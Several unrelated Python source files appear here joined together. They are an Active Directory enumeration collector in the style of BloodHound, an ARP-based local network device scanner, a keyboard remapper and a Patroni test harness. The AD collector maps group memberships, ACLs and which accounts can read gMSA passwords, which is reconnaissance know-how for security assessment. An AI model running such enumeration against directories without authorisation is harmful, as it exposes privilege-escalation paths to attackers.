group['Properties']['admincount'] = ADUtils.get_entry_property(entry, 'adminCount', default=0) == 1
group['Properties']['description'] = ADUtils.get_entry_property(entry, 'description')
whencreated = ADUtils.get_entry_property(entry, 'whencreated', default=0)
group['Properties']['whencreated'] = calendar.timegm(whencreated.timetuple())
for member in entry['attributes']['member']:
resolved_member = self.get_membership(member)
if resolved_member:
group['Members'].append(resolved_member)
# If we are enumerating ACLs, we break out of the loop here
# this is because parsing ACLs is computationally heavy and therefor is done in subprocesses
if acl:
if self.disable_pooling:
# Debug mode, don't run this pooled since it hides exceptions
self.process_acldata(parse_binary_acl(group, 'group', ADUtils.get_entry_property(entry, 'nTSecurityDescriptor', raw=True), self.addc.objecttype_guid_map))
else:
# Process ACLs in separate processes, then call the processing function to resolve entries and write them to file
self.aclenumerator.pool.apply_async(parse_binary_acl, args=(group, 'group', ADUtils.get_entry_property(entry, 'nTSecurityDescriptor', raw=True), self.addc.objecttype_guid_map), callback=self.process_acldata)
else:
# Write it to the queue -> write to file in separate thread
# this is solely for consistency with acl parsing, the performance improvement is probably minimal
self.result_q.put(group)
self.write_default_groups()
# If we are parsing ACLs, close the parsing pool first
# then close the result queue and join it
if acl and not self.disable_pooling:
self.aclenumerator.pool.close()
self.aclenumerator.pool.join()
self.result_q.put(None)
else:
self.result_q.put(None)
self.result_q.join()
logging.debug('Finished writing groups')
def enumerate_computers_dconly(self,timestamp =""):
'''
Enumerate computer objects. This function is only used if no
collection was requested that required connecting to computers anyway.
'''
filename = timestamp + 'computers.json'
acl = 'acl' in self.collect
entries = self.addc.ad.computers.values()
logging.debug('Writing computers ACL to file: %s', filename)
# Use a separate queue for processing the results
self.result_q = queue.Queue()
results_worker = threading.Thread(target=OutputWorker.membership_write_worker, args=(self.result_q, 'computers', filename))
results_worker.daemon = True
results_worker.start()
if acl and not self.disable_pooling:
self.aclenumerator.init_pool()
# This loops over the cached entries
for entry in entries:
if not 'attributes' in entry:
continue
if 'dNSHostName' not in entry['attributes']:
continue
hostname = entry['attributes']['dNSHostName']
if not hostname:
continue
samname = entry['attributes']['sAMAccountName']
cobject = ADComputer(hostname=hostname, samname=samname, ad=self.addomain, addc=self.addc, objectsid=entry['attributes']['objectSid'])
cobject.primarygroup = MembershipEnumerator.get_primary_membership(entry)
computer = cobject.get_bloodhound_data(entry, self.collect, skip_acl=True)
# If we are enumerating ACLs, we break out of the loop here
# this is because parsing ACLs is computationally heavy and therefor is done in subprocesses
if acl:
if self.disable_pooling:
# Debug mode, don't run this pooled since it hides exceptions
self.process_acldata(parse_binary_acl(computer, 'computer', ADUtils.get_entry_property(entry, 'nTSecurityDescriptor', raw=True), self.addc.objecttype_guid_map))
else:
# Process ACLs in separate processes, then call the processing function to resolve entries and write them to file
self.aclenumerator.pool.apply_async(parse_binary_acl, args=(computer, 'computer', ADUtils.get_entry_property(entry, 'nTSecurityDescriptor', raw=True), self.addc.objecttype_guid_map), callback=self.process_acldata)
else:
# Write it to the queue -> write to file in separate thread
# this is solely for consistency with acl parsing, the performance improvement is probably minimal
self.result_q.put(computer)
# If we are parsing ACLs, close the parsing pool first
# then close the result queue and join it
if acl and not self.disable_pooling:
self.aclenumerator.pool.close()
self.aclenumerator.pool.join()
self.result_q.put(None)
else:
self.result_q.put(None)
self.result_q.join()
logging.debug('Finished writing computers')
def parse_gmsa(self, user, entry):
"""
Parse GMSA DACL which states which users can read the password
"""
_, aces = parse_binary_acl(user, 'user', ADUtils.get_entry_property(entry, 'msDS-GroupMSAMembership', raw=True), self.addc.objecttype_guid_map)
processed_aces = self.aceresolver.resolve_aces(aces)
for ace in processed_aces:
if ace['RightName'] == 'Owner':
continue
ace['RightName'] = 'ReadGMSAPassword'
user['Aces'].append(ace)
def process_acldata(self, result):
"""
Process ACLs that resulted from parsing with cstruct
"""
data, aces = result
# Parse aces
data['Aces'] += self.aceresolver.resolve_aces(aces)
self.result_q.put(data)
def write_default_users(self):
"""
Write built-in users to users.json file
"""
domainsid = self.addomain.domain_object.sid
domainname = self.addomain.domain.upper()
user = {
"AllowedToDelegate": [],
"ObjectIdentifier": "%s-S-1-5-20" % domainname,
"PrimaryGroupSID": None,
"Properties": {
"domain": domainname,
"domainsid": self.addomain.domain_object.sid,
"name": "NT AUTHORITY@%s" % domainname,
},
"Aces": [],
"SPNTargets": [],
"HasSIDHistory": [],
"IsDeleted": False,
"IsACLProtected": False,
}
self.result_q.put(user)
def write_default_groups(self):
"""
Put default groups in the groups.json file
"""
# Domain controllers
rootdomain = self.addc.get_root_domain().upper()
entries = self.addc.get_domain_controllers()
group = {
"IsDeleted": False,
"IsACLProtected": False,
"ObjectIdentifier": "%s-S-1-5-9" % rootdomain,
"Properties": {
"domain": rootdomain.upper(),
"name": "ENTERPRISE DOMAIN CONTROLLERS@%s" % rootdomain,
},
"Members": [],
"Aces": []
}
for entry in entries:
resolved_entry = ADUtils.resolve_ad_entry(entry)
memberdata = {
"ObjectIdentifier": resolved_entry['objectid'],
"ObjectType": resolved_entry['type'].capitalize()
}
group["Members"].append(memberdata)
self.result_q.put(group)
domainsid = self.addomain.domain_object.sid
domainname = self.addomain.domain.upper()
# Everyone
evgroup = {
"IsDeleted": False,
"IsACLProtected": False,
"ObjectIdentifier": "%s-S-1-1-0" % domainname,
"Properties": {
"domain": domainname,
"domainsid": self.addomain.domain_object.sid,
"name": "EVERYONE@%s" % domainname,
},
"Members": [],
"Aces": []
}
self.result_q.put(evgroup)
# Authenticated users
augroup = {
"IsDeleted": False,
"IsACLProtected": False,
"ObjectIdentifier": "%s-S-1-5-11" % domainname,
"Properties": {
"domain": domainname,
"domainsid": self.addomain.domain_object.sid,
"name": "AUTHENTICATED USERS@%s" % domainname,
},
"Members": [],
"Aces": []
}
self.result_q.put(augroup)
# Interactive
iugroup = {
"IsDeleted": False,
"IsACLProtected": False,
"ObjectIdentifier": "%s-S-1-5-4" % domainname,
"Properties": {
"domain": domainname,
"domainsid": self.addomain.domain_object.sid,
"name": "INTERACTIVE@%s" % domainname,
},
"Members": [],
"Aces": []
}
self.result_q.put(iugroup)
def enumerate_memberships(self, timestamp=""):
"""
Run appropriate enumeration tasks
"""
self.enumerate_users(timestamp)
self.enumerate_groups(timestamp)
if not ('localadmin' in self.collect
or 'session' in self.collect
or 'loggedon' in self.collect
or 'experimental' in self.collect):
self.enumerate_computers_dconly(timestamp)
|
discover_devices.py | """
Module Name:
discover_devices.py
Description:
Module provides functionality to search (discover) devices in local network
and store devices' data on the SQLite3 database.
Authors:
Columbia University, the Internet Real-Time Lab (IRT Lab). 2018-2019.
"""
import gevent
import random
import time
import sys
import ipaddress
import re
import subprocess
import netifaces
import traceback
import threading
from scapy.all import srp, Ether, ARP
from datetime import datetime
import db
import utils
def search_network_devices(db_connection, net_interfaces):
"""
Function searches devices in the given network and stores/updates devices'
data on the SQLite3 database.
Arguments:
- db_connection: SQLite3 database connection.
- net_interfaces: A list of network interfaces' data. Every single element of
list is dictionary and format is {'ip': <ip addr>, 'iface': <iface name>}.
"""
if not net_interfaces:
utils.print_error('Please provide network interface(s)')
sys.exit()
if not db_connection:
utils.print_error('SQLite3 database is not connected')
sys.exit()
try:
utc_time_now = str(datetime.utcnow())
print('[' + utc_time_now + '] ' + 'Start searching devices in local network .........')
start = datetime.now()
for iface_data in net_interfaces:
iface_thr = threading.Thread(target = discover_devices, args = (db_connection, iface_data))
iface_thr.start()
except:
utils.print_error('An exception occurred in discovering devices functionality')
traceback.print_exc()
def discover_devices(db_connection, iface_data):
"""
Arguments:
- db_connection: SQLite3 database connection.
- iface_data: A network interface data.
"""
cfg = netifaces.ifaddresses(iface_data['iface'])[netifaces.AF_INET][0]
my_ip = cfg['addr']
subnet = ipaddress.IPv4Network('%s/%s' % (my_ip, cfg['netmask']), strict=False)
if subnet.prefixlen >= 24 and subnet.prefixlen < 32:
# Get a list of all IP addresses that belong to the IP subnet on
# the interface, sans the IP address of our own network
# interface.
devices = [str(ip) for ip in subnet.hosts() if str(ip) != my_ip]
search_devices(db_connection, devices, iface_data['iface'])
else:
utils.print_error('Error: currently system supports only /24 <= X < /32 IPv4 prefixes')
def search_devices(db_connection, ip_list, iface):
"""
Function constructs full IPv4 address (x.x.x concatenates with last byte),
searches devices in given IPv4 interval using gevent, which allows to makes
non-blocking requests.
Arguments:
- db_connection: SQLite3 database connection.
- reserved_ip_addresses: A list contains IPv4 addresses, which does not make
sense to do request.
- ip_list: A list of IPv4 addresses to be requested parallel (non-blocking)
- iface: Network interface name.
"""
threads = []
for ip_addr in ip_list:
ip_addr = str(ip_addr)
threads.append(gevent.spawn(request, db_connection, iface, ip_addr))
gevent.joinall(threads)
def request(db_connection, iface, ip_addr):
"""
Function does ARP request for given IPv4 address, constructs device data
(MAC, IPv4, network interface name and timestamp) based on ARP response and
stores and/or updates on the database.
Arguments:
- db_connection: SQLite3 database connection.
- iface: Network interface name.
- ip_addr: IPv4 address.
"""
hostname = ''
while 1:
try:
result = arp_request(ip_addr, iface)
if result:
ip_addr = result[0]
mac_addr = result[1]
utc_time_now = utils.get_unix_epoch_milliseconds()
# The idea is NOT to call get_device_hostname() function if we already
# got hostname.
if not hostname:
hostname = get_device_hostname(mac_addr)
data = {'mac': mac_addr, 'ip': ip_addr, 'hostname': hostname, 'iface': iface, 'last_update': utc_time_now}
db.update_device_data(db_connection, data)
except:
pass
# Just random sleep 2 seconds, plus random milliseconds in [2, 500] interval,
# before starting next round.
wait_millisecond = float(random.randint(2, 501)) / float(1000)
wait_millisecond = float(2) + wait_millisecond
time.sleep(wait_millisecond)
def arp_request(ip_addr, iface, timeout = 3):
"""
Function does ARP request to check if given IPv4 is up or down.
The fastest way to discover hosts on a local Ethernet network is to use
the Scapy's ARP Ping method.
Arguments:
- ip_addr: An IPv4 address. If given argument is empty string or undefined
it returns empty Tuple.
- iface: Network interface name.
- timeout: The timeout parameter of srp function specifies the time to wait
after the last packet has been sent. If there is, no response a None value
will be assigned instead when the timeout is reached.
Returns Tuple (IPv4 address, MAC address) if IPv4 is up and response contains
IPv4 and MAC, otherwise empty Tuple.
"""
if not ip_addr:
return tuple()
# TODO We may need to implement our own ARP request instead of using Scapy.
answered, unanswered = srp(Ether(dst = "ff:ff:ff:ff:ff:ff") / ARP(pdst = ip_addr), iface = iface, timeout = timeout, verbose = False)
if answered:
for send, receive in answered:
mac_address = receive.sprintf(r"%Ether.src%")
ip_address = receive.sprintf(r"%ARP.psrc%")
if mac_address and ip_address:
return (ip_address, mac_address)
return tuple()
def get_device_hostname(dev_mac):
"""
Function runs arp command, filters hostnames by MAC addresses, and returns
hostname if it finds, otherwise returns an empty string.
Arguments:
- dev_mac: MAC address of device.
"""
completed = subprocess.run("arp", shell = True, stdout = subprocess.PIPE)
arp_table = (completed.stdout).splitlines()
list_length = len(arp_table)
# First element is just description.
if list_length < 2:
return;
# Skip first line as it contains Address, HWtype, HWaddres, Flags Mask
# and Iface.
for i in range(1, list_length):
arp_table[i] = arp_table[i].decode("utf-8")
arp_table_dev_data = re.split(r'\s{2,}', arp_table[i])
# Make sure that it was parsed correct. After parsing a list should contain
# following data:
# list = ['192.168.1.174', 'ether', 'b0:e1:7e:c2:8c:8f', 'C', 'enp0s3']
# list[0] is Address
# list[1] is HWtype
# list[2] is HWaddres
# list[3] is Flags
# list[4] is Iface
if arp_table_dev_data and len(arp_table_dev_data) == 5:
if dev_mac == arp_table_dev_data[2]:
return arp_table_dev_data[0]
return ''
|
main-keyboard-remapper.py | #!/usr/bin/python3
#
# Remapper for Topre Realfoce and the thinkpad internal keyboard.
#
import os
import sys
import threading
import time
import evdev
from evdev import ecodes as ec
import key_remapper
NAME = "Main Keyboard Remapper"
SCRIPT_PATH = os.path.dirname(os.path.realpath(__file__))
ICON = os.path.join(SCRIPT_PATH, 'res/keyboard.png')
# AT Translated Set 2 keyboard -> thinkpad internal keyboard
# Topre Corporation Realforce -> Realforce
# P. I. Engineering XK-16 HID -> An external 8-key keyboard
DEFAULT_DEVICE_NAME = "^(AT Translated Set 2 keyboard|Topre Corporation Realforce|P. I. Engineering XK-16 HID)"
debug = False
# ESC + These keys will generate SHIFT+ALT+CTRL+META+[THE KEY]. I launch apps using them -- e.g. ESC+ENTER to launch
# Chrome.
VERSATILE_KEYS = (
ec.KEY_F1,
ec.KEY_F2,
ec.KEY_F3,
ec.KEY_F4,
ec.KEY_F5,
ec.KEY_F6,
ec.KEY_F7,
ec.KEY_F8,
ec.KEY_F9,
ec.KEY_F10,
ec.KEY_F11,
ec.KEY_F12,
ec.KEY_ENTER,
)
ALPHABET_KEYS = (
ec.KEY_A,
ec.KEY_B,
ec.KEY_C,
ec.KEY_D,
ec.KEY_E,
ec.KEY_F,
ec.KEY_G,
ec.KEY_H,
ec.KEY_I,
ec.KEY_J,
ec.KEY_K,
ec.KEY_L,
ec.KEY_M,
ec.KEY_N,
ec.KEY_O,
ec.KEY_P,
ec.KEY_Q,
ec.KEY_R,
ec.KEY_S,
ec.KEY_T,
ec.KEY_U,
ec.KEY_V,
ec.KEY_W,
ec.KEY_X,
ec.KEY_Y,
ec.KEY_Z,
)
class Wheeler:
"""Send mouse wheel events periodically
"""
def __init__(self, uinput: key_remapper.SyncedUinput):
self.__lock = threading.Lock()
self.uinput:key_remapper.SyncedUinput = uinput
self.__wheel_thread = threading.Thread(name='wheel-thread', target=self.__do_wheel)
self.__wheel_thread.setDaemon(True)
self.__event = threading.Event()
self.__vwheel_speed = 0 # Vertical wheel speed and direction: ..., -1, 0, 1, ....
self.__hwheel_speed = 0 # Vertical wheel speed and direction: ..., -1, 0, 1, ....
self.wheel_repeat_delay_normal_ms = 0.020
self.wheel_repeat_delay_fast_ms = 0.005
self.wheel_make_fast_after_this_many_events = 10
def __do_wheel(self):
# Inject mouse wheel events periodically.
# Example events:
# Event: time 1608522295.791450, type 2 (EV_REL), code 8 (REL_WHEEL), value -1
# Event: time 1608522295.791450, type 2 (EV_REL), code 11 (REL_WHEEL_HI_RES), value -120
consecutive_event_count = 0
while True:
vspeed = 0
hspeed = 0
with self.__lock:
vspeed = self.__vwheel_speed
hspeed = self.__hwheel_speed
if False:
print(f'# wheel: {vspeed} - {hspeed}')
if vspeed != 0:
self.uinput.send_event(ec.EV_REL, ec.REL_WHEEL, vspeed)
self.uinput.send_event(ec.EV_REL, ec.REL_WHEEL_HI_RES, vspeed * 120)
if hspeed != 0:
self.uinput.send_event(ec.EV_REL, ec.REL_HWHEEL, hspeed)
self.uinput.send_event(ec.EV_REL, ec.REL_HWHEEL_HI_RES, hspeed * 120)
if vspeed == 0 and hspeed == 0:
consecutive_event_count = 0
self.__event.wait()
self.__event.clear()
else:
consecutive_event_count += 1
delay = self.wheel_repeat_delay_normal_ms
if consecutive_event_count > self.wheel_make_fast_after_this_many_events:
delay = self.wheel_repeat_delay_fast_ms
time.sleep(delay)
def start(self):
self.__wheel_thread.start()
def set_vwheel(self, speed: int):
if debug: print(f'# vwheel: {speed}')
with self.__lock:
self.__vwheel_speed = speed
self.__event.set()
def set_hwheel(self, speed: int):
if debug: print(f'# hwheel: {speed}')
with self.__lock:
self.__hwheel_speed = speed
self.__event.set()
def stop(self):
self.set_vwheel(0)
self.set_hwheel(0)
class Remapper(key_remapper.BaseRemapper):
def __init__(self):
super().__init__(NAME, ICON, DEFAULT_DEVICE_NAME)
self.pending_esc_press = False
def on_initialize(self):
super().on_initialize()
self.wheeler = Wheeler(self.new_mouse_uinput("_wheel"))
self.wheeler.start()
def on_device_lost(self):
super().on_device_lost()
self.wheeler.stop()
def is_chrome(self):
title, class_group_name, class_instance_name = self.get_active_window()
return class_group_name == "Google-chrome"
def on_handle_event(self, device: evdev.InputDevice, ev: evdev.InputEvent):
if ev.type != ec.EV_KEY:
return
is_thinkpad = device.name.startswith('AT')
is_xkeys = device.name.startswith('P. I.')
# For x-keys. Convert to Shift+Ctrl+[number]
if is_xkeys:
# Special casing the first two keys.
if self.matches_key(ev, ec.KEY_1, 1, ''): self.press_key(ec.KEY_LEFT, 'a', done=True)
if self.matches_key(ev, ec.KEY_2, 1, ''): self.press_key(ec.KEY_RIGHT, 'a', done=True)
# Default setting...
# These 8 keys send KEY_1 .. KEY_8, per my configuration.
# Convert them into Shift+Ctrl+Alt+Meta+KEY
if ev.value == 1:
self.send_key_events(
(ec.KEY_LEFTSHIFT, 1),
(ec.KEY_LEFTCTRL, 1),
(ec.KEY_LEFTALT, 1),
(ec.KEY_LEFTMETA, 1),
)
self.send_ievent(ev)
if ev.value == 0:
self.send_key_events(
(ec.KEY_LEFTSHIFT, 0),
(ec.KEY_LEFTCTRL, 0),
(ec.KEY_LEFTALT, 0),
(ec.KEY_LEFTMETA, 0),
)
return
# Thinkpad only: Use ins/del as pageup/down, unless CAPS is pressed.
if is_thinkpad and not self.is_caps_pressed():
if ev.code == ec.KEY_INSERT: ev.code = ec.KEY_PAGEUP
elif ev.code == ec.KEY_DELETE: ev.code = ec.KEY_PAGEDOWN
# Special ESC handling: Don't send "ESC-press" at key-down, but instead send it on key-*up*, unless
# any keys are pressed between the down and up.
# This allows to make "ESC + BACKSPACE" act as a DEL press without sending ESC.
if ev.code == ec.KEY_ESC:
if ev.value == 1:
self.pending_esc_press = True
if ev.value in (1, 2):
return # Ignore ESC down.
# Here, ev.value must be 0.
if self.pending_esc_press:
self.pending_esc_press = False
self.press_key(ec.KEY_ESC, reset_all_keys=False, done=True)
else:
# In order to allow combos like "ESC+ctrl+Backspace", don't clear pending ESC when modifier keys
# are pressed.
if ev.code not in (
ec.KEY_LEFTALT, ec.KEY_RIGHTALT,
ec.KEY_LEFTCTRL, ec.KEY_RIGHTCTRL,
ec.KEY_LEFTSHIFT, ec.KEY_RIGHTSHIFT,
ec.KEY_LEFTMETA, ec.KEY_RIGHTMETA,
ec.KEY_CAPSLOCK
):
self.pending_esc_press = False
# ESC (or shift) + backspace -> delete
if self.matches_key(ev, ec.KEY_BACKSPACE, (1, 2), 'e'): self.press_key(ec.KEY_DELETE, done=True)
if self.matches_key(ev, ec.KEY_BACKSPACE, (1, 2), 's'): self.press_key(ec.KEY_DELETE, done=True)
# For chrome: -----------------------------------------------------------------------------------
# F5 -> back
# F6 -> forward
if self.matches_key(ev, ec.KEY_F5, 1, '', self.is_chrome): self.press_key(ec.KEY_BACK, done=True)
if self.matches_key(ev, ec.KEY_F6, 1, '', self.is_chrome): self.press_key(ec.KEY_FORWARD, done=True)
# Global keys -----------------------------------------------------------------------------------
# See VERSATILE_KEYS.
if self.matches_key(ev, VERSATILE_KEYS, 1, 'e'): self.press_key(ev.code, 'acsw', done=True)
# ESC + home/end -> ATL+Left/Right (back / forward)
if self.matches_key(ev, ec.KEY_HOME, 1, 'e'): self.press_key(ec.KEY_LEFT, 'a', done=True)
if self.matches_key(ev, ec.KEY_END, 1, 'e'): self.press_key(ec.KEY_RIGHT, 'a', done=True)
# ESC + Pageup -> ctrl + pageup (prev tab)
# ESC + Pagedown -> ctrl + pagedown (next tab)
# (meaning ESC + ins/del act as them too on thinkpad.)
if self.matches_key(ev, ec.KEY_PAGEUP, 1, 'e'): self.press_key(ec.KEY_PAGEUP, 'c', done=True)
if self.matches_key(ev, ec.KEY_PAGEDOWN, 1, 'e'): self.press_key(ec.KEY_PAGEDOWN, 'c', done=True)
# ESC + caps lock -> caps lock, in case I ever need it.
if self.matches_key(ev, ec.KEY_CAPSLOCK, 1, 'e', ignore_other_modifiers=True): self.press_key(ec.KEY_CAPSLOCK, done=True)
# # ESC + H / J / K / L -> LEFT, DOWN, UP, RIGHT
# if self.matches_key(ev, ec.KEY_H, (1, 2), 'e', ignore_other_modifiers=True): self.press_key(ec.KEY_LEFT, "*", done=True)
# if self.matches_key(ev, ec.KEY_J, (1, 2), 'e', ignore_other_modifiers=True): self.press_key(ec.KEY_DOWN, "*", done=True)
# if self.matches_key(ev, ec.KEY_K, (1, 2), 'e', ignore_other_modifiers=True): self.press_key(ec.KEY_UP, "*", done=True)
# if self.matches_key(ev, ec.KEY_L, (1, 2), 'e', ignore_other_modifiers=True): self.press_key(ec.KEY_RIGHT, "*", done=True)
# ESC + H / J / K / L -> emulate wheel. Also support ESC+SPACE / C for left-hand-only scrolling.
if self.matches_key(ev, (ec.KEY_J, ec.KEY_K, ec.KEY_SPACE, ec.KEY_C), (1, 0), 'e', ignore_other_modifiers=True):
if ev.value == 0:
self.wheeler.set_vwheel(0)
elif ev.code in (ec.KEY_K, ec.KEY_C): # Scroll up
self.wheeler.set_vwheel(1)
elif ev.code in (ec.KEY_J, ec.KEY_SPACE): # Scroll down
self.wheeler.set_vwheel(-1)
return
if self.matches_key(ev, (ec.KEY_L, ec.KEY_H), (1, 0), 'e', ignore_other_modifiers=True):
if ev.value == 0:
self.wheeler.set_hwheel(0)
elif ev.code == ec.KEY_L: # Scroll right
self.wheeler.set_hwheel(1)
elif ev.code == ec.KEY_H: # Scroll left
self.wheeler.set_hwheel(-1)
return
# ESC + other alphabet -> ctrl + shift + the key.
if self.matches_key(ev, ALPHABET_KEYS, 1, 'e'): self.press_key(ev.code, 'cs', done=True)
# Don't use capslock alone.
if ev.code == ec.KEY_CAPSLOCK: return
# Send the original event.
self.send_ievent(ev)
def main(args):
remapper = Remapper()
remapper.main(args)
if __name__ == '__main__':
main(sys.argv[1:])
|
environment.py | import abc
import datetime
import os
import json
import shutil
import signal
import six
import subprocess
import sys
import tempfile
import threading
import time
import yaml
import patroni.psycopg as psycopg
from six.moves.BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
@six.add_metaclass(abc.ABCMeta)
class AbstractController(object):
def __init__(self, context, name, work_directory, output_dir):
self._context = context
self._name = name
self._work_directory = work_directory
self._output_dir = output_dir
self._handle = None
self._log = None
def _has_started(self):
return self._handle and self._handle.pid and self._handle.poll() is None
def _is_running(self):
return self._has_started()
@abc.abstractmethod
def _is_accessible(self):
"""process is accessible for queries"""
@abc.abstractmethod
def _start(self):
"""start process"""
def start(self, max_wait_limit=5):
if self._is_running():
return True
self._log = open(os.path.join(self._output_dir, self._name + '.log'), 'a')
self._handle = self._start()
assert self._has_started(), "Process {0} is not running after being started".format(self._name)
max_wait_limit *= self._context.timeout_multiplier
for _ in range(max_wait_limit):
if self._is_accessible():
break
time.sleep(1)
else:
assert False,\
"{0} instance is not available for queries after {1} seconds".format(self._name, max_wait_limit)
def stop(self, kill=False, timeout=15, _=False):
term = False
start_time = time.time()
timeout *= self._context.timeout_multiplier
while self._handle and self._is_running():
if kill:
self._handle.kill()
elif not term:
self._handle.terminate()
term = True
time.sleep(1)
if not kill and time.time() - start_time > timeout:
kill = True
if self._log:
self._log.close()
def cancel_background(self):
pass
class PatroniController(AbstractController):
__PORT = 5360
PATRONI_CONFIG = '{}.yml'
""" starts and stops individual patronis"""
def __init__(self, context, name, work_directory, output_dir, custom_config=None):
super(PatroniController, self).__init__(context, 'patroni_' + name, work_directory, output_dir)
PatroniController.__PORT += 1
self._data_dir = os.path.join(work_directory, 'data', name)
self._connstring = None
if custom_config and 'watchdog' in custom_config:
self.watchdog = WatchdogMonitor(name, work_directory, output_dir)
custom_config['watchdog'] = {'driver': 'testing', 'device': self.watchdog.fifo_path, 'mode': 'required'}
else:
self.watchdog = None
self._scope = (custom_config or {}).get('scope', 'batman')
self._config = self._make_patroni_test_config(name, custom_config)
self._closables = []
self._conn = None
self._curs = None
def write_label(self, content):
with open(os.path.join(self._data_dir, 'label'), 'w') as f:
f.write(content)
def read_label(self, label):
try:
with open(os.path.join(self._data_dir, label), 'r') as f:
return f.read().strip()
except IOError:
return None
@staticmethod
def recursive_update(dst, src):
for k, v in src.items():
if k in dst and isinstance(dst[k], dict):
PatroniController.recursive_update(dst[k], v)
else:
dst[k] = v
def update_config(self, custom_config):
with open(self._config) as r:
config = yaml.safe_load(r)
self.recursive_update(config, custom_config)
with open(self._config, 'w') as w:
yaml.safe_dump(config, w, default_flow_style=False)
self._scope = config.get('scope', 'batman')
def add_tag_to_config(self, tag, value):
self.update_config({'tags': {tag: value}})
def _start(self):
if self.watchdog:
self.watchdog.start()
if isinstance(self._context.dcs_ctl, KubernetesController):
self._context.dcs_ctl.create_pod(self._name[8:], self._scope)
os.environ['PATRONI_KUBERNETES_POD_IP'] = '10.0.0.' + self._name[-1]
return subprocess.Popen([sys.executable, '-m', 'coverage', 'run',
'--source=patroni', '-p', 'patroni.py', self._config],
stdout=self._log, stderr=subprocess.STDOUT, cwd=self._work_directory)
def stop(self, kill=False, timeout=15, postgres=False):
if postgres:
return subprocess.call(['pg_ctl', '-D', self._data_dir, 'stop', '-mi', '-w'])
super(PatroniController, self).stop(kill, timeout)
if isinstance(self._context.dcs_ctl, KubernetesController):
self._context.dcs_ctl.delete_pod(self._name[8:])
if self.watchdog:
self.watchdog.stop()
def _is_accessible(self):
cursor = self.query("SELECT 1", fail_ok=True)
if cursor is not None:
cursor.execute("SET synchronous_commit TO 'local'")
return True
def _make_patroni_test_config(self, name, custom_config):
patroni_config_name = self.PATRONI_CONFIG.format(name)
patroni_config_path = os.path.join(self._output_dir, patroni_config_name)
with open(patroni_config_name) as f:
config = yaml.safe_load(f)
config.pop('etcd', None)
raft_port = os.environ.get('RAFT_PORT')
if raft_port:
os.environ['RAFT_PORT'] = str(int(raft_port) + 1)
config['raft'] = {'data_dir': self._output_dir, 'self_addr': 'localhost:' + os.environ['RAFT_PORT']}
host = config['postgresql']['listen'].split(':')[0]
config['postgresql']['listen'] = config['postgresql']['connect_address'] = '{0}:{1}'.format(host, self.__PORT)
config['name'] = name
config['postgresql']['data_dir'] = self._data_dir
config['postgresql']['basebackup'] = [{'checkpoint': 'fast'}]
config['postgresql']['use_unix_socket'] = os.name != 'nt' # windows doesn't yet support unix-domain sockets
config['postgresql']['use_unix_socket_repl'] = os.name != 'nt' # windows doesn't yet support unix-domain sockets
config['postgresql']['pgpass'] = os.path.join(tempfile.gettempdir(), 'pgpass_' + name)
config['postgresql']['parameters'].update({
'logging_collector': 'on', 'log_destination': 'csvlog', 'log_directory': self._output_dir,
'log_filename': name + '.log', 'log_statement': 'all', 'log_min_messages': 'debug1',
'unix_socket_directories': tempfile.gettempdir()})
if 'bootstrap' in config:
config['bootstrap']['post_bootstrap'] = 'psql -w -c "SELECT 1"'
if 'initdb' in config['bootstrap']:
config['bootstrap']['initdb'].extend([{'auth': 'md5'}, {'auth-host': 'md5'}])
if custom_config is not None:
self.recursive_update(config, custom_config)
self.recursive_update(config, {
'bootstrap': {'dcs': {'postgresql': {'parameters': {'wal_keep_segments': 100}}}}})
if config['postgresql'].get('callbacks', {}).get('on_role_change'):
config['postgresql']['callbacks']['on_role_change'] += ' ' + str(self.__PORT)
with open(patroni_config_path, 'w') as f:
yaml.safe_dump(config, f, default_flow_style=False)
user = config['postgresql'].get('authentication', config['postgresql']).get('superuser', {})
self._connkwargs = {k: user[n] for n, k in [('username', 'user'), ('password', 'password')] if n in user}
self._connkwargs.update({'host': host, 'port': self.__PORT, 'dbname': 'postgres'})
self._replication = config['postgresql'].get('authentication', config['postgresql']).get('replication', {})
self._replication.update({'host': host, 'port': self.__PORT, 'dbname': 'postgres'})
return patroni_config_path
def _connection(self):
if not self._conn or self._conn.closed != 0:
self._conn = psycopg.connect(**self._connkwargs)
self._conn.autocommit = True
return self._conn
def _cursor(self):
if not self._curs or self._curs.closed or self._curs.connection.closed != 0:
self._curs = self._connection().cursor()
return self._curs
def query(self, query, fail_ok=False):
try:
cursor = self._cursor()
cursor.execute(query)
return cursor
except psycopg.Error:
if not fail_ok:
raise
def check_role_has_changed_to(self, new_role, timeout=10):
bound_time = time.time() + timeout
recovery_status = new_role != 'primary'
while time.time() < bound_time:
cur = self.query("SELECT pg_is_in_recovery()", fail_ok=True)
if cur:
row = cur.fetchone()
if row and row[0] == recovery_status:
return True
time.sleep(1)
return False
def get_watchdog(self):
return self.watchdog
def _get_pid(self):
try:
pidfile = os.path.join(self._data_dir, 'postmaster.pid')
if not os.path.exists(pidfile):
return None
return int(open(pidfile).readline().strip())
except Exception:
return None
def patroni_hang(self, timeout):
hang = ProcessHang(self._handle.pid, timeout)
self._closables.append(hang)
hang.start()
def cancel_background(self):
for obj in self._closables:
obj.close()
self._closables = []
@property
def backup_source(self):
return 'postgres://{username}:{password}@{host}:{port}/{dbname}'.format(**self._replication)
def backup(self, dest=os.path.join('data', 'basebackup')):
subprocess.call(PatroniPoolController.BACKUP_SCRIPT + ['--walmethod=none',
'--datadir=' + os.path.join(self._work_directory, dest),
'--dbname=' + self.backup_source])
class ProcessHang(object):
"""A background thread implementing a cancelable process hang via SIGSTOP."""
def __init__(self, pid, timeout):
self._cancelled = threading.Event()
self._thread = threading.Thread(target=self.run)
self.pid = pid
self.timeout = timeout
def start(self):
self._thread.start()
def run(self):
os.kill(self.pid, signal.SIGSTOP)
try:
self._cancelled.wait(self.timeout)
finally:
os.kill(self.pid, signal.SIGCONT)
def close(self):
self._cancelled.set()
self._thread.join()
class AbstractDcsController(AbstractController):
_CLUSTER_NODE = '/service/{0}'
def __init__(self, context, mktemp=True):
work_directory = mktemp and tempfile.mkdtemp() or None
super(AbstractDcsController, self).__init__(context, self.name(), work_directory, context.pctl.output_dir)
def _is_accessible(self):
return self._is_running()
def stop(self, kill=False, timeout=15):
""" terminate process and wipe out the temp work directory, but only if we actually started it"""
super(AbstractDcsController, self).stop(kill=kill, timeout=timeout)
if self._work_directory:
shutil.rmtree(self._work_directory)
def path(self, key=None, scope='batman'):
return self._CLUSTER_NODE.format(scope) + (key and '/' + key or '')
@abc.abstractmethod
def query(self, key, scope='batman'):
""" query for a value of a given key """
@abc.abstractmethod
def cleanup_service_tree(self):
""" clean all contents stored in the tree used for the tests """
@classmethod
def get_subclasses(cls):
for subclass in cls.__subclasses__():
